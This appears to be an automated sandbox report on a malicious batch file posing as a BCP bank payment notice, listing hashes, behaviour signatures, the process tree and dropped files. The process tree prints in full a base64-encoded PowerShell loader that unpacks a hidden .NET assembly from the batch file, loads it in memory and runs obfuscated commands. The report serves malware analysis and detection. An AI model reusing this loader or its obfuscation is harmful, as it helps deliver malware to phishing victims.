799d82d6973a29bdda75b904d43bed7d3b374e32fcce7d5d78c97c3a92e380b9

General

Target

Aviso de Pago_ Banco BCP_pdf.bat
Size

191KB
MD5

61c6c921b92689fc462ef98cf4393c42
SHA1

c7884d1f87525c5eef499fafd07b4480be7e41ce
SHA256

cd840d3989614de52ba00dd9018f5be25d466da3ff1c9e4069e4590791c5818f
SHA512

03ca18981b20f4373102f50c4ed17324c0c7010e61bd906dfab9a5cee8df07d93b390e58348a56d220d41ccdcedfa6c9b3bb9925c452580f2da0c2ecf5214f0d
SSDEEP

3072:eIHnuWaKzqMxl9XVZM0yKfTX3lDnZwGx+x+8gNkssp+kmsKpUCasZyHQiaTmcxas:nHuWaKz7H9XVyonJnZitwks2rsUo0H5o

Score

1^/10

Malware Config

Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2348 powershell.exe
1960 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2348 powershell.exe
1960 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2348 powershell.exe
Token: SeDebugPrivilege 1960 powershell.exe

pid	process
2348	powershell.exe
1960	powershell.exe

pid	process
2348	powershell.exe
1960	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	1960	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 1672 wrote to memory of 2216	1672	cmd.exe	cmd.exe
PID 1672 wrote to memory of 2216	1672	cmd.exe	cmd.exe
PID 1672 wrote to memory of 2216	1672	cmd.exe	cmd.exe
PID 2216 wrote to memory of 2348	2216	cmd.exe	powershell.exe
PID 2216 wrote to memory of 2348	2216	cmd.exe	powershell.exe
PID 2216 wrote to memory of 2348	2216	cmd.exe	powershell.exe
PID 2216 wrote to memory of 2348	2216	cmd.exe	powershell.exe
PID 2216 wrote to memory of 1960	2216	cmd.exe	powershell.exe
PID 2216 wrote to memory of 1960	2216	cmd.exe	powershell.exe
PID 2216 wrote to memory of 1960	2216	cmd.exe	powershell.exe
PID 2216 wrote to memory of 1960	2216	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Aviso de Pago_ Banco BCP_pdf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Aviso de Pago_ Banco BCP_pdf.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:2216

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KJGVuY29kZWRBcnJheSA9IEAoMTU5LDIyMCwyMzgsMjM4LDIyNCwyMzIsMjIxLDIzMSwyNDQsMTY5LDE5MiwyMzMsMjM5LDIzNywyNDQsMjAzLDIzNCwyMjgsMjMzLDIzOSwxNjksMTk2LDIzMywyNDEsMjM0LDIzMCwyMjQsMTYzLDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY3LDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY0LDE4MikNCiRkZWNvZGVkU3RyaW5nID0gQ29udmVydC1Bc2NpaVRvU3RyaW5nICRlbmNvZGVkQXJyYXkNCg0KDQokZmlsZVBhdGggPSBKb2luLVBhdGggJGVudjpVc2VyUHJvZmlsZSAiY2hyb21lLmJhdCINCiRsYXN0TGluZSA9IEdldC1Db250ZW50IC1QYXRoICRmaWxlUGF0aCB8IFNlbGVjdC1PYmplY3QgLUxhc3QgMQ0KJGNsZWFuZWRMaW5lID0gJGxhc3RMaW5lIC1yZXBsYWNlICdeOjonDQokcmV2ZXJzZSA9IFJldmVyc2VTdHJpbmcgJGNsZWFuZWRMaW5lDQokZGVjb21wcmVzc2VkQnl0ZSA9IERlY29tcHJlc3NCeXRlcyAtY29tcHJlc3NlZERhdGEgJHJldmVyc2UNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCkludm9rZS1FeHByZXNzaW9uICRkZWNvZGVkU3RyaW5nDQoNCkNsb3NlLVByb2Nlc3MgLVByb2Nlc3NOYW1lICJjbWQi')) | Out-File -FilePath 'C:\Users\Admin\chrome.ps1' -Encoding UTF8"
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\chrome.ps1"
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
5e173b74b8e0e9e6d0a5e04d70bfeed1

SHA1
08ae0b54e6421ae1beae6128958a2b9b2f72771f

SHA256
e16ab1dda1c5cec2665a455fc44b62fcb8204686425ff2ea3f8531ddc04e4244

SHA512
f96ea280d989f894587c74945f1d883eb23d4183d9b2c5de836e6376db37d5197b88558cf97b265ff33cd83541f40eab5878d03d280658c4e96933721b220978

Download Submit
C:\Users\Admin\chrome.bat
Filesize
191KB

MD5
61c6c921b92689fc462ef98cf4393c42

SHA1
c7884d1f87525c5eef499fafd07b4480be7e41ce

SHA256
cd840d3989614de52ba00dd9018f5be25d466da3ff1c9e4069e4590791c5818f

SHA512
03ca18981b20f4373102f50c4ed17324c0c7010e61bd906dfab9a5cee8df07d93b390e58348a56d220d41ccdcedfa6c9b3bb9925c452580f2da0c2ecf5214f0d

Download Submit
C:\Users\Admin\chrome.ps1
Filesize
1KB

MD5
1d6288e218ce9fed4e703ef5aa2e6c08

SHA1
39c5fbc0b8931bab67c40dc3f45be696ea3beb90

SHA256
d0832834c002fe7e915e8c78b21642df8ab90dd778e77f8c9dfbf93d9a517ae6

SHA512
c45d64b2aede293f414e1325d711df3314cf9527a62dbb362cf4210b8eeedcb8232feca70bf6a548cc865c9598c02620667b4920a049c9f50d7d7c0eda68507c

Download Submit
memory/1960-21-0x00000000746D0000-0x0000000074C7B000-memory.dmp

Filesize
5.7MB

Download
memory/1960-22-0x0000000002780000-0x00000000027C0000-memory.dmp

Filesize
256KB

Download
memory/1960-25-0x0000000002780000-0x00000000027C0000-memory.dmp

Filesize
256KB

Download
memory/1960-16-0x0000000002780000-0x00000000027C0000-memory.dmp

Filesize
256KB

Download
memory/1960-15-0x00000000746D0000-0x0000000074C7B000-memory.dmp

Filesize
5.7MB

Download
memory/1960-17-0x00000000746D0000-0x0000000074C7B000-memory.dmp

Filesize
5.7MB

Download
memory/1960-18-0x0000000002780000-0x00000000027C0000-memory.dmp

Filesize
256KB

Download
memory/1960-24-0x0000000002780000-0x00000000027C0000-memory.dmp

Filesize
256KB

Download
memory/1960-23-0x00000000746D0000-0x0000000074C7B000-memory.dmp

Filesize
5.7MB

Download
memory/2348-4-0x0000000074710000-0x0000000074CBB000-memory.dmp

Filesize
5.7MB

Download
memory/2348-9-0x0000000074710000-0x0000000074CBB000-memory.dmp

Filesize
5.7MB

Download
memory/2348-5-0x0000000074710000-0x0000000074CBB000-memory.dmp

Filesize
5.7MB

Download
memory/2348-6-0x00000000028E0000-0x0000000002920000-memory.dmp

Filesize
256KB

Download
memory/2348-7-0x00000000028E0000-0x0000000002920000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads